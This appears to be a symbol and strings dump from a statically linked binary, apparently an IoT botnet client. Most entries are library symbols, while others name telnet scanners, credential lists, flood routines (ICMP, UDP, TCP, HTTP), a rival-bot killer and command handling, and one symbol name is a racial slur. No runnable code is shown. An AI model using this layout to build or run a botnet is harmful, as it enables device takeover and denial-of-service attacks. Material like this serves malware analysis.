__C_ctype_tolower.c
__C_ctype_tolower_data
closedir.c
opendir.c
fd_to_DIR
C.11.5298
readdir64.c
parse_config.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fclose.c
_L_lock_53
_L_unlock_65
_L_unlock_82
_L_lock_103
fopen.c
fprintf.c
_WRITE.c
_fopen.c
_L_lock_205
_L_lock_216
_L_unlock_232
_L_unlock_242
_fwrite.c
Degas are we not drawn onward no In union drawn onward to new eras aged
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
vfprintf.c
_L_unlock_62
fgetc.c
_L_lock_35
fgets.c
_L_unlock_43
fflush_unlocked.c
_L_lock_13
_L_unlock_88
_L_unlock_104
_L_lock_144
_L_unlock_156
_L_lock_164
_L_unlock_174
_L_lock_195
_L_unlock_239
fgetc_unlocked.c
fgets_unlocked.c
memmove.c
strchrnul.c
strrchr.c
memrchr.c
strcspn.c
strspn.c
strtok_r.c
strpbrk.c
inet_aton.c
gethostbyname2_r.c
calloc.c
realloc.c
libc-tls.c
init_static_tls
static_slotinfo
static_dtv
static_map
dl-support.c
brk.c
fstat.c
mremap.c
xstatconv.c
getdents64.c
fseeko.c
fseeko64.c
_L_lock_34
_L_unlock_108
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
rawmemchr.c
mempcpy.c
ntop.c
inet_pton4
xdigits.5147
inet_ntop4
decoded.c
dnslookup.c
last_id.6918
last_ns_num.6917
opennameservers.c
skip_nospace
skip_and_NUL_space
resolv_conf_mtime.6903
closenameservers.c
get_hosts_byname_r.c
gethostbyname_r.c
gethostname.c
poll.c
__syscall_poll
stat.c
uname.c
llseek.c
strdup.c
encodeh.c
decodeh.c
encodeq.c
read_etc_hosts_r.c
strcasecmp.c
encoded.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
userID
__GI___glibc_strerror_r
waitpid
__res_sync
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI_time
getgid
__getpid
sysconf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
fdopendir
contains_fail
__GI___ctype_toupper
__GI_strcasecmp
putc_unlocked
recv
connect
__encode_question
__GI___uClibc_fini
D3cOdeMePlS
numpids
__encode_header
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__xstat32_conv
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
__GI_setsid
Phonepid
memmove
sendTCP
__GI_strpbrk
__GI_fgetc
__GI_htonl
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
phone2
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
__write
getc_unlocked
__ctype_b
__GI_random_r
usernames
sendUKNOWN
errno
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
__libc_h_errno
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
HackerScan1
wildString
__waitpid_nocancel
__xpg_strerror_r
__read
getc
prctl
_dl_tls_static_used
memcpy
makeRandomStr
__GI_fputs_unlocked
execl
__GI_fgets
__GI___open_nocancel
sendHTTP
_stdio_openlist_dec_use
sclose
__libc_select
Do nine men interpret Nine men I nod
_ppfs_init
puts
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
getuid
__GI_htons
system
__open_etc_hosts
malloc
__open
isatty
sleep
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
__GI___write_nocancel
phonepayload
random_r
__dso_handle
__nptl_deallocate_tsd
gethostbyname_r
tcpcsum
fdpclose
socket
__GI_dup2
select
_dl_nothread_init_static_tls
__GI_ntohl
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
D1ckSuckaz
__GI_memset
__GI_closedir
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__resolv_timeout
__libc_read
__GI_opendir
__libc_disable_asynccancel
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
sigaddset
_dl_tls_static_align
__GI_tcgetattr
__environ
mmap
__GI_ntohs
_Exit
wcsnrtombs
bzero
makeIPPacket
_dl_tls_max_dtv_idx
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI___register_atfork
__GI_getgid
srandom_r
__open_nocancel
_init
D1ckSucka
__GI_inet_ntoa_r
hostname_to_ip
__GI_setstate_r
parseHex
strtol
__GI___read
pipe
strnlen
rawmemchr
uname
__GI_mempcpy
__malloc_state
__sigaddset
strrchr
nanosleep
__GI_send
calloc
h_errno
__pthread_mutex_unlock
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
rindex
__GI_execl
__GI_srandom_r
__GI___sigismember
__GI___ctype_tolower
write
__fork_generation_pointer
environ
__GI_close
getBuild
Server_Botport
fstat
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI___sigaddset
TelnetPayload2
__GI_brk
_dl_tls_static_size
__GI_nanosleep
__GI_stat
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_gethostname
__GI_fseek
_custom_printf_arginfo
__GI___libc_write
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
setsockopt
bsd_signal
fseek
mremap
__GI_kill
__GI_strcmp
__GI___open
__GI_memmove
sendSTD
setstate
__read_nocancel
__decode_dotted
__local_nameserver
__stdio_READ
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
_dl_tls_dtv_slotinfo_list
_custom_printf_spec
gethostbyname2_r
__progname
strcasestr
_start
__deregister_frame_info_bases
__GI___read_nocancel
strstr
__GI_ioctl
init_rand
rand
__close_nameservers
__libc_errno
signal
read
__xstat64_conv
__decode_header
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
__linkin_atfork
strncpy
__GI___libc_close
program_invocation_short_name
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
HackerScan2
realloc
__register_atfork
__GI_gethostbyname_r
__GI_strncpy
_dl_tls_dtv_gaps
TelnetPayload
__libc_send
PhoneScanner
__GI___xpg_strerror_r
readdir64
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__GI___fputc_unlocked
getEndianness
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
__GI___fcntl_nocancel
__stdio_rfill
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
_store_inttype
__getpagesize
__GI_random
God A red nugget A fat egg under a dog
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
_pthread_cleanup_push_defer
index
processCmd
__sigismember
fopen
__bss_start
__libc_open
__pthread_unwind
__GI_strchrnul
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
listFork
__stdio_fwrite
_dl_tls_setup
negotiate
srand
_dl_tls_generation
__GI_uname
__resolv_attempts
__nptl_nthreads
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
inet_ntoa
tcgetattr
time
opendir
__libc_system
__GI_abort
poll
__GI___write
fdpopen
__GI_fprintf
__GI___sigdelset
__get_hosts_byname_r
__GI___close_nocancel
__GI__exit
botkiller
herror
strcmp
__GI_strrchr
advances2
__nameserver
data_start
HackerScan
__GI_sysconf
__fork_handlers
__h_errno_location
__GI_putc_unlocked
matchPrompt
__GI_inet_pton
__libc_enable_asynccancel
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__write_nocancel
__vfork
__GI_mmap
fgetc
gethostname
contains_success
sprintf
Niggerdirs
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
strcspn
socket_connect
__GI_waitpid
__GI_vfprintf
_stdio_term
__GI_signal
stderr
fails
__GI_readdir64
vfork
__C_ctype_b
__libc_setup_tls
srandom
ICMPFlood
_ppfs_setargs
__GI___libc_waitpid
__GI_sendto
__GI_sigemptyset
__waitpid
__libc_fork
__close_nocancel
_dl_init_static_tls
__atexit_lock
scanPid
__fork_lock
__fcntl_nocancel
rand_cmwc
findARandomIP
advances
getsockopt
__GI_fseeko64
_dl_tls_static_nelem
hstrerror
fflush_unlocked
__stdio_wcommit
HackerPrint
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
stat
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
__GI___waitpid
__close
__GI_gethostbyname2
access
_edata
__stdout
__GI___close
__GI_memrchr
__GI_fflush_unlocked
__GI_isspace
__GI_strstr
__searchdomains
__GI_fstat
_end
phone
htons
__GI_fputc_unlocked
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
PhoneScan
__GI_connect
__curbrk
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
gethostbyname2
_dl_aux_init
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
_custom_printf_handler
_setjmp
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__getdents64
__lll_lock_wait_private
strlen
lseek64
open
program_invocation_name
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__fork
__libc_sendto
__stdio_trans2w_o
__GI_vfork
__GI_config_read
strchr
__GI_rawmemchr
__GI_gethostbyname2_r
__GI_raise
__data_start
setsid
__GI_inet_addr
__GI_config_open
closedir
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___libc_read
__GI___errno_location
fputc_unlocked
strchrnul
fcntl
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
__GI_config_close
__libc_connect
passwords
__GI_strlen
pids
vfprintf
__progname_full
strpbrk
_load_inttype
__lll_unlock_wake_private
rangechoice
raise
useragents
free
__GI_strcspn
sigprocmask
__fputc_unlocked
getsockname
